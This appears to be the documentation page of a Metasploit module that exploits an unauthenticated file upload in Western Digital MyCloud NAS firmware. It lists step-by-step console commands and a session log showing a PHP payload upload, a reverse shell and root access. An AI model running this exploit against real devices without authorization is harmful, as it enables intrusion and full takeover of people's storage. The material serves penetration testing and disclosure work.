## Description

This module exploits a file upload vulnerability found in Western Digital's MyCloud NAS web administration HTTP service. The /web/jquery/uploader/multi_uploadify.php PHP script provides multipart upload functionality that is accessible without authentication and can be used to place a file anywhere on the device's file system. This allows an attacker the ability to upload a PHP shell onto the device and obtain arbitrary code execution as root.

## Vulnerable Application
	
  [Western Digital](https://www.wdc.com/) designs drives and network attached storage (NAS) devices for both consumers and businesses.

  This module was tested successfully on a MyCloud PR4100 with firmware version 2.30.172 .

## Verification Steps

1. Do: ```use exploit/linux/http/wd_mycloud_multiupload_upload```
2. Do: ```set RHOST [IP]```
3. Do: ```check```
4. It should be reported as vulnerable
5. Do: ```run```
6. You should get a shell

## Scenarios

```
msf > use exploit/linux/http/wd_mycloud_multiupload_upload
msf exploit(wd_mycloud_multiupload_upload) > set RHOST 192.168.86.104
RHOST => 192.168.86.104
msf exploit(wd_mycloud_multiupload_upload) > check
[+] 192.168.86.104:80 The target is vulnerable.
msf exploit(wd_mycloud_multiupload_upload) > run

[*] Started reverse TCP handler on 192.168.86.215:4444 
[*] Uploading PHP payload (1124 bytes) to '/var/www'.
[+] Uploaded PHP payload successfully.
[*] Making request for '/.7bc5NqFMK5.php' to execute payload.
[*] Sending stage (37543 bytes) to 192.168.86.104
[*] Meterpreter session 1 opened (192.168.86.215:4444 -> 192.168.86.104:38086) at 2017-11-28 06:07:14 -0600
[+] Deleted .7bc5NqFMK5.php

meterpreter > getuid
Server username: root (0)
```